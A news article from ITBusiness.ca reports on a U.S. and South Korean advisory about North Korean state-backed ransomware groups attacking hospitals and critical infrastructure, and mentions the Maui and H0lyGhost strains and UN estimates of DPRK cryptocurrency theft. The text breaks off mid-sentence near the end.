ITBusiness.ca

U.S., South Korea issue alert on North Korean-based ransomware groups

Image by Aquir via GettyImages.ca

North Korean state-sponsored ransomware groups are targeting hospitals and other critical infrastructure organizations, U.S. and South Korean law enforcement and intelligence agencies are warning.

“The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK (Democratic People’s Republic of Korea) national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments,” the alert issued Thursday says.

“Specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. The IOCs [indicators of compromise] in this product should be useful to sectors previously targeted by DPRK cyber operations (e.g., U.S. government, Department of Defense, and Defense Industrial Base). The authoring agencies highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.”

The report includes the latest tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) used by North Korean-based attackers. Among the more recent weapons are attempts to exploit unpatched applications with the Apache Log4J2 vulnerability and unpatched SonicWall appliances.

North Korean attackers are known for hiding where they are coming from, the report adds, including sometimes pretending to be other ransomware groups, such as the REvil gang.

The alert is an update to a July 6, 2022 warning by American intelligence and law enforcement agencies, including the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the NSA.

That report noted the use by North Korean groups of the Maui strain of ransomware. The new report adds that these groups are also using a strain called H0lyGhost, described by Microsoft in a July 14, 2022 report.

The latest report comes the same week as the Associated Press reported that a United Nations panel concluded North Korean hackers working for the government stole virtual assets, including cryptocurrency and intellectual property, estimated to be worth between US$630 million and more than US$1 billion.

“2022 was a record-breaking year for DPRK virtual asset theft,” the AP quoted the report saying. In April, 2022, the U.S. linked North Korean-backed hackers to the US$615 million crypto heist on the popular online game Axie Infinity.

The AP said the panel identified three groups – Kimsuky, Lazarus Group and Andariel — as the main North Korean attackers.

Between February and July 2022, AP quoted the panel as saying the Lazarus Group “reportedly targeted energy providers in multiple member states using a vulnerability” to install malware and gain long-term access. It said this “aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies … to siphon off proprietary intellectual property.”

The U.S./South Korea alert urges IT and security departments to

Exit mobile version